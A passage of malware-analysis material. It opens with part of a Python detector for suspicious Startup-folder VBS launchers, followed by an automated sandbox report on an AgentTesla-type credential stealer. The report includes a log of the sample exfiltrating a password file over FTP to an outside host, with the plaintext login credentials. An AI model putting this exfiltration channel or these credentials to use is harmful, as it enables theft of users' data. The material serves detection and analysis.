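    'sh.Run """C:\\Program Files\\Vendor\\agent.exe"" /tray", 0\r\n'
).encode("ascii")

def decode_script(data: bytes) -> str:
    """Decode a WSH script as wscript would: honour a BOM if present,
    otherwise treat a file whose odd bytes are mostly NUL as UTF-16LE."""
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le", errors="replace")
    if data.startswith(b"\xef\xbb\xbf"):
        return data[3:].decode("utf-8", errors="replace")
    if len(data) >= 2 and data[1::2].count(0) > len(data) // 4:
        return data.decode("utf-16-le", errors="replace")
    return data.decode("latin-1")

# First argument of <object>.Run "..."; VBScript doubles quotes inside a literal.
RUN_RE = re.compile(r'\.Run\s+"((?:""|[^"])*)"', re.IGNORECASE)

def run_targets(script: str) -> list:
    """Command strings handed to WScript.Shell.Run, with "" unescaped to "."""
    return [m.group(1).replace('""', '"') for m in RUN_RE.finditer(script)]

# User-writable locations a Startup-folder script has no business launching from.
SUSPICIOUS_DIRS = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\temp\\", "\\users\\public\\")

def executable_of(command: str) -> str:
    """Executable path from a Run command line (quoted path or first token)."""
    cmd = command.strip()
    if cmd.startswith('"') and cmd.count('"') >= 2:
        return cmd[1:cmd.index('"', 1)]
    return cmd.split(" ", 1)[0]

def is_suspicious_target(command: str) -> bool:
    exe = executable_of(command).lower()
    return exe.endswith(".exe") and any(d in exe for d in SUSPICIOUS_DIRS)

def assess(data: bytes) -> dict:
    """Decode, extract Run targets and flag the ones in user-writable dirs."""
    targets = run_targets(decode_script(data))
    return {"targets": targets, "suspicious": [t for t in targets if is_suspicious_target(t)]}

if __name__ == "__main__":
    print(assess(SAMPLE_VBS))
    print(assess(BENIGN_VBS))
```

On a real host, feed `assess()` the bytes of every file under each user's `Start Menu\Programs\Startup` folder; the UTF-16 handling matters because AutoIt's FileWrite with a Unicode flag, as seen here, produces BOM-less UTF-16LE that an ASCII-only grep for "WScript.Shell" would miss.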
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                    Entropy (8bit):7.964461200331325
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.39%
                                    • UPX compressed Win32 Executable (30571/9) 0.30%
                                    • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    File name:SAL987656700.exe
                                    File size:892'416 bytes
                                    MD5:a885a9c7468691538b78d54852b5a59c
                                    SHA1:1b2340a366a6b28ac9d30f31bacef95afd0de595
                                    SHA256:d2d196a12c822020c4042d607be77746951b6cb3c16201ff21ca8e9c5c786209
                                    SHA512:903c918ef94c4dd9c8277c7cffe2774a26af285e1e41dcf71c5c3aee1fc65d1202a2eb227267bb044c050299acbfb67b970ca75e17f5da1fc48e89472f45173c
                                    SSDEEP:12288:9sHzOUNUSB/o5LsI1uwajJ5yvv1l2lclTUX1MDc35Qx3tkscoP80In35zFYoRn33:UiUmSB/o5d1ubcv620n356C0IpZnJGO
                                    TLSH:C715235B51C1DC6AE8122378847A8DE1D3F02931DBE57BBD8B44F65E3874393C10BA66
                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                    Icon Hash:aaf3e3e3938382a0
                                    Entrypoint:0x561740
                                    Entrypoint Section:UPX1
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x677B4A4E [Mon Jan 6 03:13:18 2025 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:21371b611d91188d602926b15db6bd48
                                    Instruction
                                    pushad
                                    mov esi, 00505000h
                                    lea edi, dword ptr [esi-00104000h]
                                    push edi
                                    jmp 00007F2F0D0F071Dh
                                    nop
                                    mov al, byte ptr [esi]
                                    inc esi
                                    mov byte ptr [edi], al
                                    inc edi
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F2F0D0F06FFh
                                    mov eax, 00000001h
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc eax, eax
                                    add ebx, ebx
                                    jnc 00007F2F0D0F071Dh
                                    jne 00007F2F0D0F073Ah
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F2F0D0F0731h
                                    dec eax
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc eax, eax
                                    jmp 00007F2F0D0F06E6h
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc ecx, ecx
                                    jmp 00007F2F0D0F0764h
                                    xor ecx, ecx
                                    sub eax, 03h
                                    jc 00007F2F0D0F0723h
                                    shl eax, 08h
                                    mov al, byte ptr [esi]
                                    inc esi
                                    xor eax, FFFFFFFFh
                                    je 00007F2F0D0F0787h
                                    sar eax, 1
                                    mov ebp, eax
                                    jmp 00007F2F0D0F071Dh
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F2F0D0F06DEh
                                    inc ecx
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F2F0D0F06D0h
                                    add ebx, ebx
                                    jne 00007F2F0D0F0719h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc ecx, ecx
                                    add ebx, ebx
                                    jnc 00007F2F0D0F0701h
                                    jne 00007F2F0D0F071Bh
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jnc 00007F2F0D0F06F6h
                                    add ecx, 02h
                                    cmp ebp, FFFFFB00h
                                    adc ecx, 02h
                                    lea edx, dword ptr [edi+ebp]
                                    cmp ebp, FFFFFFFCh
                                    jbe 00007F2F0D0F0720h
                                    mov al, byte ptr [edx]
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                     Name | Virtual Address | Virtual Size | Is in Section
                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1deb80 | 0x424 | .rsrc
                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x162000 | 0x7cb80 | .rsrc
                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1defa4 | 0x14 | .rsrc
                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x161924 | 0x18 | UPX1
                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x161944 | 0xa0 | UPX1
                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                     UPX0 | 0x1000 | 0x104000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     UPX1 | 0x105000 | 0x5d000 | 0x5ca00 | b8db83d0f28430b42b70d496db43c020 | False | 0.9885211074561403 | data | 7.937300160418177 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .rsrc | 0x162000 | 0x7d000 | 0x7d000 | c8ff72b376a435e7c3a215538c8f5abb | False | 0.959794921875 | data | 7.9582034907557215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                     RT_ICON | 0x1625ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                     RT_ICON | 0x1626d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                     RT_ICON | 0x162804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                     RT_ICON | 0x162930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                     RT_ICON | 0x162c1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                     RT_ICON | 0x162d48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                     RT_ICON | 0x163bf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                     RT_ICON | 0x1644a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                     RT_ICON | 0x164a0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                     RT_ICON | 0x166fb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                     RT_ICON | 0x168064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                     RT_MENU | 0xda4a0 | 0x50 | empty | English | Great Britain | 0
                                     RT_STRING | 0xda4f0 | 0x594 | empty | English | Great Britain | 0
                                     RT_STRING | 0xdaa84 | 0x68a | empty | English | Great Britain | 0
                                     RT_STRING | 0xdb110 | 0x490 | empty | English | Great Britain | 0
                                     RT_STRING | 0xdb5a0 | 0x5fc | empty | English | Great Britain | 0
                                     RT_STRING | 0xdbb9c | 0x65c | empty | English | Great Britain | 0
                                     RT_STRING | 0xdc1f8 | 0x466 | empty | English | Great Britain | 0
                                     RT_STRING | 0xdc660 | 0x158 | empty | English | Great Britain | 0
                                     RT_RCDATA | 0x1684d0 | 0x76116 | data | | | 1.0003225766429698
                                     RT_GROUP_ICON | 0x1de5ec | 0x76 | data | English | Great Britain | 0.6610169491525424
                                     RT_GROUP_ICON | 0x1de668 | 0x14 | data | English | Great Britain | 1.25
                                     RT_GROUP_ICON | 0x1de680 | 0x14 | data | English | Great Britain | 1.15
                                     RT_GROUP_ICON | 0x1de698 | 0x14 | data | English | Great Britain | 1.25
                                     RT_VERSION | 0x1de6b0 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                     RT_MANIFEST | 0x1de790 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                     DLL | Import
                                     KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                     ADVAPI32.dll | GetAce
                                     COMCTL32.dll | ImageList_Remove
                                     COMDLG32.dll | GetSaveFileNameW
                                     GDI32.dll | LineTo
                                     IPHLPAPI.DLL | IcmpSendEcho
                                     MPR.dll | WNetGetConnectionW
                                     ole32.dll | CoGetObject
                                     OLEAUT32.dll | OleLoadPicture
                                     PSAPI.DLL | GetProcessMemoryInfo
                                     SHELL32.dll | DragFinish
                                     USER32.dll | GetDC
                                     USERENV.dll | LoadUserProfileW
                                     UxTheme.dll | IsThemeActive
                                     VERSION.dll | VerQueryValueW
                                     WININET.dll | FtpOpenFileW
                                     WINMM.dll | timeGetTime
                                     WSOCK32.dll | connect
                                     Language of compilation system | Country where language is spoken | Map
                                     English | Great Britain |
                                     Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                     2025-01-06T17:03:20.250590+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 49711 | 162.241.62.63 | 21 | TCP
                                     2025-01-06T17:03:20.644800+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49714 | 162.241.62.63 | 32929 | TCP
                                     2025-01-06T17:03:20.650314+0100 | 1800009 | Joe Security MALWARE AgentTesla - FTP Exfil Passwords | 1 | 192.168.2.5 | 49714 | 162.241.62.63 | 32929 | TCP
                                     2025-01-06T17:03:20.650314+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49714 | 162.241.62.63 | 32929 | TCP
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Jan 6, 2025 17:03:03.655004978 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                     Jan 6, 2025 17:03:03.659878969 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                     Jan 6, 2025 17:03:03.660012007 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                     Jan 6, 2025 17:03:03.665081978 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                     Jan 6, 2025 17:03:03.669848919 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                     Jan 6, 2025 17:03:04.138696909 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                     Jan 6, 2025 17:03:04.191821098 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                     Jan 6, 2025 17:03:05.428960085 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:05.435220003 CET | 21 | 49705 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:05.435307026 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:05.453782082 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:05.460098982 CET | 21 | 49705 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:05.460158110 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:17.777456999 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                     Jan 6, 2025 17:03:17.782428026 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
                                     Jan 6, 2025 17:03:17.782536983 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                     Jan 6, 2025 17:03:17.782908916 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                     Jan 6, 2025 17:03:17.787655115 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
                                     Jan 6, 2025 17:03:18.011972904 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                     Jan 6, 2025 17:03:18.235019922 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
                                     Jan 6, 2025 17:03:18.285631895 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                     Jan 6, 2025 17:03:18.934787035 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:18.939685106 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:18.939774036 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:19.451276064 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:19.451558113 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:19.456341982 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:19.564841032 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:19.564965010 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:19.569715977 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:19.777668953 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:19.785460949 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:19.790240049 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:19.900284052 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:19.900434017 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:19.905267000 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.016629934 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.016763926 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:20.021723986 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.130750895 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.131010056 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:20.135799885 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.244719028 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.245507002 CET | 49714 | 32929 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:20.250350952 CET | 32929 | 49714 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.250432968 CET | 49714 | 32929 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:20.250590086 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:20.255357027 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.644556046 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.644799948 CET | 49714 | 32929 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:20.644874096 CET | 49714 | 32929 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:20.649563074 CET | 32929 | 49714 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.650262117 CET | 32929 | 49714 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.650314093 CET | 49714 | 32929 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:20.691873074 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:20.775264978 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5
                                     Jan 6, 2025 17:03:20.816874027 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63
                                     Jan 6, 2025 17:03:33.059834003 CET | 53370 | 53 | 192.168.2.5 | 162.159.36.2
                                     Jan 6, 2025 17:03:33.064652920 CET | 53 | 53370 | 162.159.36.2 | 192.168.2.5
                                     Jan 6, 2025 17:03:33.064737082 CET | 53370 | 53 | 192.168.2.5 | 162.159.36.2
                                     Jan 6, 2025 17:03:33.069605112 CET | 53 | 53370 | 162.159.36.2 | 192.168.2.5
                                     Jan 6, 2025 17:03:33.537436962 CET | 53370 | 53 | 192.168.2.5 | 162.159.36.2
                                     Jan 6, 2025 17:03:33.542386055 CET | 53 | 53370 | 162.159.36.2 | 192.168.2.5
                                     Jan 6, 2025 17:03:33.542454004 CET | 53370 | 53 | 192.168.2.5 | 162.159.36.2
                                     Jan 6, 2025 17:04:08.942256927 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                     Jan 6, 2025 17:04:08.947470903 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
                                     Jan 6, 2025 17:04:08.947664022 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Jan 6, 2025 17:03:03.638039112 CET | 51231 | 53 | 192.168.2.5 | 1.1.1.1
                                     Jan 6, 2025 17:03:03.645544052 CET | 53 | 51231 | 1.1.1.1 | 192.168.2.5
                                     Jan 6, 2025 17:03:05.108865976 CET | 62492 | 53 | 192.168.2.5 | 1.1.1.1
                                     Jan 6, 2025 17:03:05.427422047 CET | 53 | 62492 | 1.1.1.1 | 192.168.2.5
                                     Jan 6, 2025 17:03:33.059339046 CET | 53 | 50888 | 162.159.36.2 | 192.168.2.5
                                     Jan 6, 2025 17:03:33.558921099 CET | 58948 | 53 | 192.168.2.5 | 1.1.1.1
                                     Jan 6, 2025 17:03:33.566123962 CET | 53 | 58948 | 1.1.1.1 | 192.168.2.5
                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                     Jan 6, 2025 17:03:03.638039112 CET | 192.168.2.5 | 1.1.1.1 | 0x23a | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                     Jan 6, 2025 17:03:05.108865976 CET | 192.168.2.5 | 1.1.1.1 | 0xd6d4 | Standard query (0) | ftp.antoniomayol.com | A (IP address) | IN (0x0001) | false
                                     Jan 6, 2025 17:03:33.558921099 CET | 192.168.2.5 | 1.1.1.1 | 0x89de | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                     Jan 6, 2025 17:03:03.645544052 CET | 1.1.1.1 | 192.168.2.5 | 0x23a | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                     Jan 6, 2025 17:03:05.427422047 CET | 1.1.1.1 | 192.168.2.5 | 0xd6d4 | No error (0) | ftp.antoniomayol.com | antoniomayol.com | | CNAME (Canonical name) | IN (0x0001) | false
                                     Jan 6, 2025 17:03:05.427422047 CET | 1.1.1.1 | 192.168.2.5 | 0xd6d4 | No error (0) | antoniomayol.com | | 162.241.62.63 | A (IP address) | IN (0x0001) | false
                                     Jan 6, 2025 17:03:33.566123962 CET | 1.1.1.1 | 192.168.2.5 | 0x89de | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                    • ip-api.com
                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     0 | 192.168.2.5 | 49704 | 208.95.112.1 | 80 | 2316 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     Jan 6, 2025 17:03:03.665081978 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                     Host: ip-api.com
                                     Connection: Keep-Alive
                                     Jan 6, 2025 17:03:04.138696909 CET | 175 | IN | HTTP/1.1 200 OK
                                    Date: Mon, 06 Jan 2025 16:03:03 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 6
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                    Data Raw: 66 61 6c 73 65 0a
                                    Data Ascii: false


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     1 | 192.168.2.5 | 49706 | 208.95.112.1 | 80 | 5376 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     Jan 6, 2025 17:03:17.782908916 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                     Host: ip-api.com
                                     Connection: Keep-Alive
                                     Jan 6, 2025 17:03:18.235019922 CET | 175 | IN | HTTP/1.1 200 OK
                                    Date: Mon, 06 Jan 2025 16:03:17 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 6
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 45
                                    X-Rl: 43
                                    Data Raw: 66 61 6c 73 65 0a
                                    Data Ascii: false


                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                     Jan 6, 2025 17:03:19.451276064 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                         220-You are user number 1 of 150 allowed.
                                         220-Local time is now 10:03. Server port: 21.
                                         220-IPv6 connections are also welcome on this server.
                                         220 You will be disconnected after 15 minutes of inactivity.
                                     Jan 6, 2025 17:03:19.451558113 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63 | USER johnson@antoniomayol.com
                                     Jan 6, 2025 17:03:19.564841032 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5 | 331 User johnson@antoniomayol.com OK. Password required
                                     Jan 6, 2025 17:03:19.564965010 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63 | PASS cMhKDQUk1{;%
                                     Jan 6, 2025 17:03:19.777668953 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5 | 230-OK. Current restricted directory is /
                                         230 8 Kbytes used (0%) - authorized: 2048000 Kb
                                     Jan 6, 2025 17:03:19.900284052 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5 | 504 Unknown command
                                     Jan 6, 2025 17:03:19.900434017 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63 | PWD
                                     Jan 6, 2025 17:03:20.016629934 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5 | 257 "/" is your current location
                                     Jan 6, 2025 17:03:20.016763926 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63 | TYPE I
                                     Jan 6, 2025 17:03:20.130750895 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5 | 200 TYPE is now 8-bit binary
                                     Jan 6, 2025 17:03:20.131010056 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63 | PASV
                                     Jan 6, 2025 17:03:20.244719028 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5 | 227 Entering Passive Mode (162,241,62,63,128,161)
                                     Jan 6, 2025 17:03:20.250590086 CET | 49711 | 21 | 192.168.2.5 | 162.241.62.63 | STOR PW_user-287400_2025_01_06_11_03_17.html
                                     Jan 6, 2025 17:03:20.644556046 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5 | 150 Accepted data connection
                                     Jan 6, 2025 17:03:20.775264978 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.5 | 226-9 Kbytes used (0%) - authorized: 2048000 Kb
                                         226-File successfully transferred
                                         226 0.115 seconds (measured here), 2.73 Kbytes per second


                                    Target ID:0
                                    Start time:11:02:59
                                    Start date:06/01/2025
                                    Path:C:\Users\user\Desktop\SAL987656700.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SAL987656700.exe"
                                    Imagebase:0x880000
                                    File size:892'416 bytes
                                    MD5 hash:A885A9C7468691538B78D54852B5A59C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:11:03:00
                                    Start date:06/01/2025
                                    Path:C:\Users\user\AppData\Local\enterogenous\cunila.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SAL987656700.exe"
                                    Imagebase:0x520000
                                    File size:892'416 bytes
                                    MD5 hash:A885A9C7468691538B78D54852B5A59C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
